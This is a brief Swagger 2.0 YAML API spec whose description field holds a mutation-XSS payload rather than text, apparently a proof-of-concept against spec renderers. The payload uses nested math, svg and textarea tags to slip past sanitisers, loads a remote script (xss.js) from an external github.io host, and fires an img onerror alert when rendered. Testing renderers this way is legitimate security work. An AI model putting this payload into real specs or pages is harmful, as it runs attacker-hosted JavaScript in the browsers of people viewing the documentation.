swagger: '2.0'
info:
  title: Example yaml.spec1
  description: 
    <math><mtext><option><FAKEFAKE><option></option><mglyph><svg><mtext><textarea><a title="<script src='https://zerone0x01.github.io/xss.js'></script></textarea><script src=https://zerone0x01.github.io/xss.js></script><img onerror=alert('123456') src=1>">
paths:
  /accounts:
    get:
      responses:
        '200':
          description: No response was specified
      tags:
        - accounts
      operationId: findAccounts
      summary: Finds all accounts
